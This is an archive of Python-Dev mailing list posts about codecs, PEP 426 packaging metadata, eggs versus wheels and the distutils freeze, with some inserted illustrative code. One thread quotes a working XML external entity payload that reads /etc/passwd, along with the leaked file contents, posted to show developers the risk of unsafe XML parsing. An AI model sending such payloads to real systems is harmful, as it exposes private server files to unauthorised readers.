Re: [Python-Dev] Why can't I encode/decode base64 without importing a module?
On 23.04.2013 17:47, Guido van Rossum wrote:
> On Tue, Apr 23, 2013 at 8:22 AM, M.-A. Lemburg m...@egenix.com wrote:
>> Just as reminder: we have the general purpose encode()/decode() functions in the codecs module:
>>
>>     import codecs
>>     r13 = codecs.encode('hello world', 'rot-13')
>>
>> These interface directly to the codec interfaces, without enforcing type restrictions. The codec defines the supported input and output types.
>
> As an implementation mechanism I see nothing wrong with this. I hope the codecs module lets you introspect the input and output types of a codec given by name?

At the moment there is no standard interface to access supported input and output types... but then: regular Python functions or methods also don't provide such functionality, so no surprise there ;-)

It's mostly a matter of specifying the supported type combinations in the codec documentation.

BTW: What would be a use case where you'd want to programmatically access such information before calling the codec ?

--
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source (#1, Apr 23 2013)
Python Projects, Consulting and Support ... http://www.egenix.com/
mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/
mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/

2013-04-17: Released eGenix mx Base 3.2.6 ... http://egenix.com/go43

: Try our mxODBC.Connect Python Database Interface for free ! ::

eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
Registered at Amtsgericht Duesseldorf: HRB 46611
http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
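[Editorial illustration] The codecs.encode()/codecs.decode() functions mentioned in this message can be tried with two codecs that accept different types. This is a minimal sketch, assuming a current Python 3 interpreter, where rot-13 is a str-to-str codec and base64 is a bytes-to-bytes codec; the variable names are illustrative only.

```python
import codecs

# rot-13 maps text to text, so the input and the output are both str.
r13 = codecs.encode("hello world", "rot-13")
plain = codecs.decode(r13, "rot-13")

# base64 maps binary data to binary data, so both sides are bytes.
b64 = codecs.encode(b"hello world", "base64")
raw = codecs.decode(b64, "base64")

print(r13)
print(b64)
```

As the message says, it is the codec that decides which input and output types it supports; the functions themselves only dispatch to the codec looked up by name.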
Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python
Reminds me of the encoding attacks that were possible in earlier versions of Python... you could have e.g. an email processing script run the Python test suite by simply sending a specially crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
> On 21.02.2013 11:32, Antoine Pitrou wrote:
>> You haven't proved that these were actual threats, nor how they actually worked. I'm gonna remain skeptical if there isn't anything more precise than "It highly depends on the parser and the application what kind of exploit is possible."
>
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
>
> $ ./python-external.py
>
> REQUEST:
> <weather>Aachen</weather>
>
> RESPONSE:
> <weather>The weather in Aachen is terrible.</weather>
>
> REQUEST:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY passwd SYSTEM "file:///etc/passwd">
> ]>
> <weather>&passwd;</weather>
>
> RESPONSE:
> <error>Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi</error>
>
> REQUEST:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY url SYSTEM "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
> ]>
> <weather>&url;</weather>
>
> RESPONSE:
> <error>Unknown city -----BEGIN DH PARAMETERS-----
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -----END DH PARAMETERS-----
>
> These are the 512 bit DH parameters from "Assigned Number for SKIP Protocols" (http://www.skip-vpn.org/spec/numbers.html). See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a safe prime.
> </error>
>
> Q.E.D.
>
> Christian

--
Marc-Andre Lemburg
eGenix.com (Feb 24 2013)
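[Editorial illustration] The external-entity requests shown in this message all depend on the document carrying a DOCTYPE declaration. One possible countermeasure, sketched here with the standard library's xml.parsers.expat module, is to abort parsing as soon as a DOCTYPE is seen. This is not the code from python-external.py or from defusedxml; the names DoctypeForbidden and extract_text are hypothetical, and the payload below is a reconstruction of the request in the transcript.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Hypothetical exception: the document declares a DTD."""


def extract_text(data: bytes) -> str:
    """Return the character data of a document, refusing any DOCTYPE."""
    chunks = []
    parser = xml.parsers.expat.ParserCreate()

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here propagates out of parser.Parse() and stops parsing
        # before any entity declared in the DTD can be expanded.
        raise DoctypeForbidden(name)

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


PAYLOAD = (
    b'<?xml version="1.0" encoding="utf-8"?>'
    b'<!DOCTYPE weather [<!ENTITY passwd SYSTEM "file:///etc/passwd">]>'
    b"<weather>&passwd;</weather>"
)

print(extract_text(b"<weather>Aachen</weather>"))
try:
    extract_text(PAYLOAD)
except DoctypeForbidden as exc:
    print("rejected document with DOCTYPE:", exc)
```

Rejecting every DOCTYPE is a blunt choice: it also refuses harmless documents that declare a DTD, which an application accepting only simple request bodies like the ones above may find acceptable.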
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 20.02.2013 03:37, Paul Moore wrote:
> On 20 February 2013 00:54, Fred Drake f...@fdrake.net wrote:
>> I'd posit that anything successful will no longer need to be added to the standard library, to boot. Packaging hasn't done well there.
>
> distlib may be the exception, though. Packaging tools are somewhat unique because of the chicken and egg issue involved in having a packaging tool with external dependencies - who installs your dependencies for you? So enabling technology (library code to perform packaging-related tasks, particularly in support of standardised formats) could be better available from the stdlib.
>
>> I'd rather see a successful packaging story develop than bundle it into the standard library. The latter just isn't that interesting any more.
>
> Bundling too early is a bad idea though. distlib is developing fast and to do so it needs (1) a development cycle independent of python's and (2) compatibility and ease of use with earlier versions of Python (the latter is also critical for adoption in place of custom code in packaging tools).
>
> Aiming for an accelerated level of development targeting inclusion in Python 3.4 is plausible, though. MAL pointed out that agreeing standards but not offering tools to support them in the stdlib is risky, as people have no incentive to adopt those standards.
>
> We've got 6 months or more until 3.4 feature freeze, let's not make any decision too soon, though.

I'm fine with not adding distlib to Python 3.4. The point I wanted to make was that there has to be a reference implementation of the PEP that tool makers can use to avoid reinventing the wheel over and over again (each with its own set of problems).

If distlib implements the PEP, then it just needs to be mentioned there as a suitable reference implementation.

--
Marc-Andre Lemburg
eGenix.com (Feb 20 2013)
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 20.02.2013 00:16, Daniel Holth wrote:
> On Tue, Feb 19, 2013 at 5:10 PM, M.-A. Lemburg m...@egenix.com wrote:
>> On 19.02.2013 23:01, Daniel Holth wrote:
>>> On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote:
>>>> On 19.02.2013 14:40, Nick Coghlan wrote:
>>>>> On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
>>>>>> * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO).
>>>>>
>>>>> Other tools involved in Python distribution may also use this format.
>>>>>
>>>>> The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions.
>>>>
>>>> Oh, come on, Nick, that's just silly. setuptools was included in stdlib for a short while, so the above is simply wrong. Eggs are the most widely used binary distribution format for Python package on PyPI:
>>>>
>>>> # wc *files.csv
>>>>    25585    25598  1431013 2013-02-19-egg-files.csv
>>>>     4619     4640   236694 2013-02-19-exe-files.csv
>>>>      254      255    13402 2013-02-19-msi-files.csv
>>>>   104691   104853  5251962 2013-02-19-tar-gz-files.csv
>>>>       24       24     1221 2013-02-19-whl-files.csv
>>>>    17937    18022   905913 2013-02-19-zip-files.csv
>>>>   153110   153392  7840205 total
>>>>
>>>> (based on todays PyPI stats)
>>>>
>>>> It doesn't really help ignoring realities... and I'm saying that as one of the core devs who got setuptools kicked out of the stdlib again.
>>>>
>>>> -- Marc-Andre Lemburg eGenix.com
>>>
>>> The wheel philosophy is that it should be supported by both python-dev and setuptools and that you should feel happy about using setuptools if you like it whether or not python-dev (currently) endorses that. If you are using setuptools (distribute's pkg_resources) then you can use both at the same time.
>>>
>>> Distribute, distutils and setuptools' problems have not been well understood which I think is why there has been a need to discredit setuptools by calling it non-standard. It is the de facto standard. If your packages have dependencies there is no other choice. Wheel tries to solve the real problem by allowing you to build a package with setuptools while giving the end-user the choice of installing setuptools or not.
>>>
>>> Of course eggs are the most popular right now. The wheel format is very egg-like while avoiding some of egg's problems. See the comparison in the PEP or read the story on wheel's rtfd. The wheel project includes tools to losslessly convert eggs or bdist_wininst to wheel.
>>
>> That's all fine, but it doesn't explain the refusal to add the documentation of the location of the PKG-INFO file in eggs ?
>
> It would just be a sentence, I wouldn't have a problem with it but I also don't see why it would be necessary. Even setuptools doesn't touch the file usually. Right now distribute's pkg_resources currently only understands Requires-Dist if it is inside a .dist-info directory.

Perhaps I'm not clear enough. I'll try again :-)

The wording in the PEP alienates the egg format by defining an incompatible new standard for the location of the metadata file:

There are three standard locations for these metadata files:

* the PKG-INFO file included in the base directory of Python source distribution archives (as created by the distutils sdist command)
* the {distribution}-{version}.dist-info/METADATA file in a wheel binary distribution archive (as described in PEP 425, or a later version of that specification)
* the {distribution}-{version}.dist-info/METADATA files in a local Python installation database (as described in PEP 376, or a later version of that specification)

It's easy to upgrade distribute and distutils to write metadata 1.2 format, simply by changing the version in the PKG-INFO files.

These additions are necessary to fix the above and also include the standard location of the metadata for pip and distutils installations:

* the EGG-INFO/PKG-INFO file in an egg binary distribution archive (as created by the distribute bdist_egg command)
* the {distribution}-{version}.egg/EGG-INFO/PKG-INFO file in an installed egg distribution archive
* the {distribution}-{version}.egg-info/PKG-INFO file for packages installed with pip install or distribute's python setup.py install
* the {distribution}-{version}.egg-info file for packages installed with distutils' python setup.py install

--
Marc-Andre Lemburg
eGenix.com (Feb 20 2013)
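[Editorial illustration] The archive locations discussed in this message (EGG-INFO/PKG-INFO in an egg, {distribution}-{version}.dist-info/METADATA in a wheel) can be checked mechanically, since both formats are zip archives. The sketch below is an assumption-laden example, not part of any packaging tool: find_metadata_member and read_archive_metadata are hypothetical helpers, and the demo archive is built in memory rather than taken from PyPI.

```python
import io
import zipfile
from email.parser import Parser


def find_metadata_member(names):
    """Return the archive member holding the metadata, or None."""
    for name in names:
        if name == "EGG-INFO/PKG-INFO":  # egg binary distribution
            return name
        parts = name.split("/")
        if (len(parts) == 2 and parts[0].endswith(".dist-info")
                and parts[1] == "METADATA"):  # wheel binary distribution
            return name
    return None


def read_archive_metadata(fileobj):
    """Parse the metadata file of an egg or wheel into a message object."""
    with zipfile.ZipFile(fileobj) as archive:
        member = find_metadata_member(archive.namelist())
        if member is None:
            raise LookupError("no metadata file found")
        return Parser().parsestr(archive.read(member).decode("utf-8"))


# Build a tiny stand-in for an egg, purely for demonstration.
demo_egg = io.BytesIO()
with zipfile.ZipFile(demo_egg, "w") as archive:
    archive.writestr("EGG-INFO/PKG-INFO",
                     "Metadata-Version: 1.1\nName: demo\nVersion: 0.1\n")
demo_egg.seek(0)

metadata = read_archive_metadata(demo_egg)
print(metadata["Name"], metadata["Version"])
```

The installed-distribution locations listed above (the .egg, .egg-info and .dist-info directories in site-packages) would need a directory walk instead of a zip lookup and are left out of this sketch.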
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 17.02.2013 11:11, Nick Coghlan wrote:
> FYI
>
> -- Forwarded message --
> From: Nick Coghlan ncogh...@gmail.com
> Date: Sun, Feb 17, 2013 at 8:10 PM
> Subject: PEP 426 is now the draft spec for distribution metadata 2.0
> To: DistUtils mailing list distutils-...@python.org
>
> The latest draft of PEP 426 is up at http://www.python.org/dev/peps/pep-0426/
>
> Major changes since the last draft:
>
> 1. Metadata-Version is 2.0 rather than 1.3, and the field now has the same major.minor semantics as are defined for wheel versions in PEP 427 (i.e. if a tool sees a major version number it doesn't recognise, it should give up rather than trying to guess what to do with it, while it's OK to process a higher minor version)
>
> 2. The Private-Version field is added, and several examples are given showing how to use it in conjunction with translated public versions when a project wants to use a version numbering scheme that the standard installation tools won't understand.
>
> 3. The environment markers section more clearly covers the need to handle parentheses (this was mentioned in the text, but not the pseudo-grammar), and the fields which support those markers have an explicit cross-reference to that section of the spec.
>
> 4. Leading/trailing whitespace and date based versioning are explicitly excluded from valid public versions
>
> 5. Version compatibility statistics are provided for this PEP relative to PEP 386 (the analysis script has been added to the PEP repo if anyone wants to check my numbers)
>
> 6. I have reclaimed BDFL-Delegate status (with Guido's approval)
>
> Since getting wheel support into pip no longer depends on this version of the metadata spec, I plan to leave it open for comment for another week, and then accept it next weekend if I don't hear any significant objections.

Overall, I think the meta data for Python packages is getting too complicated. Without a support module in the stdlib implementing the required parsing, evaluation and formatting mechanisms needed to analyze and write the format, I'm -1 on adding yet another format version on top of the stack.

At the moment, discussing yet another version update is mostly academic, since not even version 1.2 has been picked up by the tools yet:

distutils still writes version 1.1 meta data and doesn't even understand 1.2 meta data.

The only tool in wide spread use that understands part of the 1.2 data is setuptools/distribute, but it can only understand the Requires-Dist field of that version of the spec (only because the 1.1 Requires field was deprecated) and interprets a Provides-Extra field which isn't even standard. All other 1.2 fields are ignored. setuptools/distribute still writes 1.1 meta-data.

I've never seen environment markers being used or supported in the wild.

I'm not against modernizing the format, but given that version 1.2 has been out for around 8 years now, without much following, I think we need to make the implementation bit a requirement before accepting the PEP.

--
Marc-Andre Lemburg
eGenix.com (Feb 19 2013)
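[Editorial illustration] The major.minor rule described in item 1 of the quoted announcement (give up on an unrecognised major version, but process a higher minor version) can be sketched as below. The table KNOWN_VERSIONS and the three result strings are assumptions made for this example; neither PEP 426 nor any tool defines them.

```python
# Hypothetical table: for each major version this tool recognises,
# the highest minor version it was written against.
KNOWN_VERSIONS = {1: 2, 2: 0}


def check_metadata_version(value, known=KNOWN_VERSIONS):
    """Classify a Metadata-Version string using the major.minor rule."""
    major_text, _, minor_text = value.strip().partition(".")
    major, minor = int(major_text), int(minor_text or 0)
    if major not in known:
        # Unrecognised major version: give up instead of guessing.
        return "reject"
    if minor > known[major]:
        # Newer minor version: still fine to process, perhaps with a warning.
        return "process-with-warning"
    return "process"


for version in ("1.1", "2.0", "2.3", "3.0"):
    print(version, check_metadata_version(version))
```

This covers only the version gate. The parts of the spec the message calls complicated (requirement fields, environment markers, version comparison and sorting) are outside what this sketch attempts.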
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 11:28, Nick Coghlan wrote:
> On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote:
>> On 17.02.2013 11:11, Nick Coghlan wrote:
>> I'm not against modernizing the format, but given that version 1.2 has been out for around 8 years now, without much following, I think we need to make the implementation bit a requirement before accepting the PEP.
>
> It is being implemented in distlib, and the (short!) appendix to the PEP itself shows how to read the format using the standard library's email module.

Hmm, what is distlib and where does it live ?

The PEP only shows how to parse the RFC822-style format used by the metadata. That's not what I was referring to.

If a tool wants to support metadata 2.0, it has to support all the complicated stuff as well, i.e. handle the requires fields, the environment markers and version comparisons/sorting.

> v2.0 is designed to fix many of the issues that prevented the adoption of v1.2, including tweaks to the standardised version scheme and the addition of a formal extension mechanism to avoid the ad hoc extensions that occurred with earlier metadata versions.

Some more notes:

* I find it confusing that we now have two version schemes, one defined in PEP 426 (hidden in the middle of the document) and one in PEP 386. It would be better to amend or replace PEP 386, since that's where you look for Python version strings.

* PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO).

Not sure whether related or not, I also think it would be a good idea to make the metadata file available on PyPI for download (could be sent there when registering the package release). The register command only posts the data as 1.0 metadata, but includes fields from metadata 1.1. PyPI itself only displays part of the data.

It would be useful to have the metadata readily available for inspection on PyPI without having to download one of the distribution files first.

--
Marc-Andre Lemburg
eGenix.com (Feb 19 2013)
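[Editorial illustration] The point that the RFC822-style format can be read with the standard library's email module is easy to demonstrate. This is a minimal sketch with an invented PKG-INFO text; it is not the appendix from the PEP, and it does only the easy part (field parsing), not the requirement, marker or version handling the message asks about.

```python
from email.parser import Parser

# Invented sample metadata, for illustration only.
PKG_INFO = """\
Metadata-Version: 1.2
Name: example
Version: 1.0
Requires-Dist: foo (>=1.0)
Requires-Dist: bar
"""

message = Parser().parsestr(PKG_INFO)

# Single-valued fields are read like dictionary entries.
name = message["Name"]
version = message["Version"]

# Multiple-use fields need get_all(); plain indexing returns only one value.
requires = message.get_all("Requires-Dist", [])

print(name, version, requires)
```

The values come back as uninterpreted strings, so "foo (>=1.0)" still has to be split into a project name and a version specifier by whatever tool consumes it.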
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 14:40, Nick Coghlan wrote:
> On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
>> * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO).
>
> Other tools involved in Python distribution may also use this format.
>
> The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions.

Oh, come on, Nick, that's just silly. setuptools was included in stdlib for a short while, so the above is simply wrong. Eggs are the most widely used binary distribution format for Python package on PyPI:

# wc *files.csv
   25585    25598  1431013 2013-02-19-egg-files.csv
    4619     4640   236694 2013-02-19-exe-files.csv
     254      255    13402 2013-02-19-msi-files.csv
  104691   104853  5251962 2013-02-19-tar-gz-files.csv
      24       24     1221 2013-02-19-whl-files.csv
   17937    18022   905913 2013-02-19-zip-files.csv
  153110   153392  7840205 total

(based on todays PyPI stats)

It doesn't really help ignoring realities... and I'm saying that as one of the core devs who got setuptools kicked out of the stdlib again.

--
Marc-Andre Lemburg
eGenix.com (Feb 19 2013)
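[Editorial illustration] The wc figures in this message can be turned into shares with a few lines of arithmetic. The sketch assumes that the first wc column (line count) approximates the number of files of each type, and that egg, exe, msi and whl are the binary formats being compared; both assumptions are this example's, not statements from the message.

```python
# Line counts copied from the wc output in the message (first column).
WC_LINES = {
    "egg": 25585,
    "exe": 4619,
    "msi": 254,
    "tar-gz": 104691,
    "whl": 24,
    "zip": 17937,
}

# Assumption: these four are the binary distribution formats.
BINARY_FORMATS = ("egg", "exe", "msi", "whl")

total = sum(WC_LINES.values())
binary_total = sum(WC_LINES[fmt] for fmt in BINARY_FORMATS)
shares = {fmt: WC_LINES[fmt] / binary_total for fmt in BINARY_FORMATS}
most_common = max(BINARY_FORMATS, key=WC_LINES.get)

print("total lines:", total)
for fmt in BINARY_FORMATS:
    print(f"{fmt}: {shares[fmt]:.1%} of binary files")
print("most common binary format:", most_common)
```

The computed total matches the "total" row of the wc output, which is a useful check that the flattened figures were read correctly.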
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 14:40, Nick Coghlan wrote:
> On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
>> On 19.02.2013 11:28, Nick Coghlan wrote:
>>> On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote:
>>>> On 17.02.2013 11:11, Nick Coghlan wrote:
>>>> I'm not against modernizing the format, but given that version 1.2 has been out for around 8 years now, without much following, I think we need to make the implementation bit a requirement before accepting the PEP.
>>>
>>> It is being implemented in distlib, and the (short!) appendix to the PEP itself shows how to read the format using the standard library's email module.
>>
>> Hmm, what is distlib and where does it live ?
>
> As part of the post-mortem of packaging's removal from Python 3.3, several subcomponents were identified as stable and useful. distlib is those subcomponents extracted into a separate repository by Vinay Sajip.
>
> It will be proposed as the standard library infrastructure for building packaging related tools, while distutils will become purely a build system and have nothing to do with installing software directly (except perhaps on developer machines).

Shouldn't those details be mentioned in the PEP ?

>> The PEP only shows how to parse the RFC822-style format used by the metadata. That's not what I was referring to.
>>
>> If a tools wants to support metadata 2.0, it has to support all the complicated stuff as well, i.e. handle the requires fields, the environment markers and version comparisons/sorting.
>
> Which is what distutils2 can be used for now, and what distlib will provide without the unwanted build system infrastructure in distutils2.
>
>>> v2.0 is designed to fix many of the issues that prevented the adoption of v1.2, including tweaks to the standardised version scheme and the addition of a formal extension mechanism to avoid the ad hoc extensions that occurred with earlier metadata versions.
>>
>> Some more notes:
>>
>> * I find it confusing that we now have two version schemes, one defined in PEP 426 (hidden in the middle of the document) and one in PEP 386. It would be better to amend or replace PEP 386, since that's where you look for Python version strings.
>
> You can't understand version specifiers without understanding the sort order defined for the version scheme, so documenting them separately is just a recipe for confusion.

PEP 386 defines both. The point here is that the version scheme goes far beyond the metadata format and is complicated enough to warrant a separate PEP.

> I plan to mark PEP 386 as Withdrawn when I accept this PEP, as the sorting scheme it defines is broken, and the distutils changes proposed in that PEP are never going to happen.

Hmm, Tarek is the author, so only he can withdraw the PEP, AFAIK.

>> * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO).
>
> Other tools involved in Python distribution may also use this format.
>
> The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions.

See my other reply.

>> Not sure whether related or not, I also think it would be a good idea to make the metadata file available on PyPI for download (could be sent there when registering the package release). The register command only posts the data as 1.0 metadata, but includes fields from metadata 1.1. PyPI itself only displays part of the data.
>
> It's not related, but I plan to propose the adoption of TUF (with GPG based signatures) for PyPI's end-to-end security solution, and the conversion of the metadata files to JSON for distribution through TUF's metadata support. (Donald Stufft already wrote PEP 426 <-> JSON bidirectional converter as part of an unrelated experiment)

Why convert the metadata format you are defining in PEP 426 to yet another format when it can be uploaded as file straight to PyPI ?

TUF doesn't have anything to do with that, agreed ;-)

>> It would be useful to have the metadata readily available for inspection on PyPI without having to download one of the distribution files first.
>
> Indeed, which is a large part of why TUF (aka The Update Framework: https://www.updateframework.com/) is such an interesting security solution.

The suggestion to have the metadata available on PyPI doesn't have anything to do with security.

It's about being able to determine compatibility and select the right distribution file for download.

The metadata also helps in creating dependency graphs, which are useful for a lot of things.

--
Marc-Andre Lemburg
eGenix.com (Feb 19 2013)
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 23:01, Daniel Holth wrote:
> On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote:
>> On 19.02.2013 14:40, Nick Coghlan wrote:
>>> On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
>>>> * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO).
>>>
>>> Other tools involved in Python distribution may also use this format.
>>>
>>> The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions.
>>
>> Oh, come on, Nick, that's just silly. setuptools was included in stdlib for a short while, so the above is simply wrong. Eggs are the most widely used binary distribution format for Python package on PyPI:
>>
>> # wc *files.csv
>>    25585    25598  1431013 2013-02-19-egg-files.csv
>>     4619     4640   236694 2013-02-19-exe-files.csv
>>      254      255    13402 2013-02-19-msi-files.csv
>>   104691   104853  5251962 2013-02-19-tar-gz-files.csv
>>       24       24     1221 2013-02-19-whl-files.csv
>>    17937    18022   905913 2013-02-19-zip-files.csv
>>   153110   153392  7840205 total
>>
>> (based on todays PyPI stats)
>>
>> It doesn't really help ignoring realities... and I'm saying that as one of the core devs who got setuptools kicked out of the stdlib again.
>>
>> -- Marc-Andre Lemburg eGenix.com
>
> The wheel philosophy is that it should be supported by both python-dev and setuptools and that you should feel happy about using setuptools if you like it whether or not python-dev (currently) endorses that. If you are using setuptools (distribute's pkg_resources) then you can use both at the same time.
>
> Distribute, distutils and setuptools' problems have not been well understood which I think is why there has been a need to discredit setuptools by calling it non-standard. It is the de facto standard. If your packages have dependencies there is no other choice. Wheel tries to solve the real problem by allowing you to build a package with setuptools while giving the end-user the choice of installing setuptools or not.
>
> Of course eggs are the most popular right now. The wheel format is very egg-like while avoiding some of egg's problems. See the comparison in the PEP or read the story on wheel's rtfd. The wheel project includes tools to losslessly convert eggs or bdist_wininst to wheel.

That's all fine, but it doesn't explain the refusal to add the documentation of the location of the PKG-INFO file in eggs ?

> I am confident distlib can thrive outside of the standard library! Why the rush to kill it before its prime?

Who's trying to kill distlib ?

--
Marc-Andre Lemburg
eGenix.com (Feb 19 2013)
Re: [Python-Dev] BDFL delegation for PEP 426 + distutils freeze
On 03.02.2013 19:33, Éric Araujo wrote:
>> I vote for removing the "distutils is frozen" principle.
>
> I’ve also been thinking about that. There have been two exceptions to the freeze, for ABI flags in extension module names and for pycache directories. When the stable ABI was added and MvL wanted to change distutils (I don’t know to do what exactly), Tarek stood firm on the freeze and asked for any improvement to go into distutils2, and after MvL said that he would not contribute to an outside project, we merged d2 into the stdlib. Namespace packages did not impact distutils either. Now that we’ve removed packaging from the stdlib, we have two Python features that are not supported in the standard packaging system, and I agree that it is a bad thing for our users.
>
> I’d like to propose a reformulation of the freeze:
>
> - refactorings for the sake of cleanup are still shunned
> - fixes to really old bugs that have become the expected behavior are still avoided
> - fixes to follow OS changes are still allowed (we’ve had a number for Debian multiarch, Apple moving stuff around, Windows manifest options changes)
> - support for Python evolutions that involve totally new code, commands or setup parameters are now possible (this enables stable API support as well as a new bdist format)
> - behavior changes to track Python behavior changes are now possible (this enables recognizing namespace packages, unless we decide they need a new setup parameter)
>
> We’ll probably need to talk this over at PyCon (FYI I won’t be at the language summit but I’ll take part in the packaging mini-summit planned thanks to Nick).

+1 on lifting the freeze from me.

--
Marc-Andre Lemburg
eGenix.com (Feb 04 2013)
Re: [Python-Dev] [Python-checkins] Cron docs@dinsdale /home/docs/build-devguide
On 22.12.2012 21:36, Terry Reedy wrote:

On 12/22/2012 1:30 PM, Cron Daemon wrote:

abort: error: Connection timed out

As a volunteer checkin-list admin, I occasionally get messages like this:

'''
As list administrator, your authorization is requested for the following mailing list posting:

List: python-check...@python.org
From: r...@python.org
Subject: Cron docs@dinsdale /home/docs/build-devguide
Reason: Message has implicit destination

At your convenience, visit: http://mail.python.org/mailman/admindb/python-checkins to approve or deny the request.
'''

I always reject the requests as I don't believe these messages belong here. I even asked, some months ago, on pydev who was responsible for the robot that sends these but got no answer. Today, apparently, another list admin decided on the opposite response and gave r...@python.org blanket permission to flood this list with irrelevancy. It is not my responsibility and I have no idea how to fix it.

You can add a sender filter to have the messages automatically discarded.

While people with push privileges are supposed to subscribe to this list, I know there is at least one who unsubscribed because of the volume. This will only encourage more to leave, so I hope someone can stop it.

I think such messages should go to a sys admin list.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 22 2012)
Re: [Python-Dev] [Catalog-sig] accept the wheel PEPs 425, 426, 427
On 13.11.2012 10:51, Martin v. Löwis wrote:

On 13.11.12 03:04, Nick Coghlan wrote:

On Mon, Oct 29, 2012 at 4:47 AM, Daniel Holth dho...@gmail.com wrote:

I think Metadata 1.3 is done. Who would like to czar?

(Apologies for the belated reply, it's been a busy few weeks) I'm happy to be BDFL delegate for these. I'd like to see PEP 425 updated with some additional rationale based on Ronald's comments later in this thread, though.

For the record, I'm still -1 on PEP 427, because of the signature issues. The FAQ in the PEP is incorrect in claiming PGP or X.509 cannot readily be used to verify the integrity of an archive - the whole point of these technologies is to do exactly that. The FAQ is entirely silent on why it is not using a more standard signature algorithm such as ECDSA. It explains why it uses Ed25519, but ignores that the very same rationale would apply to ECDSA as well; plus that would be one of the standard JWS algorithms. In addition, the FAQ claims that the format is designed to introduce cryptography that is actually used, yet leaves the issue of key distribution alone (except for pointing out that you can put them into requires.txt - a file that doesn't seem to be specified anywhere).

I agree with Martin. If the point is to protect against cryptography that is not used, then not using the de-facto standard in signing open source distribution files, which today is PGP/GPG, misses that point :-)

Note that signing such distribution files can be handled outside of the wheel format PEP. It's just way too complex and out of scope for the wheel format itself.

Also note that PGP/GPG and the other signing tools work well on any distribution file. There's really no need to build these into the format itself. It's a good idea to check integrity, but that can be done using hashes.

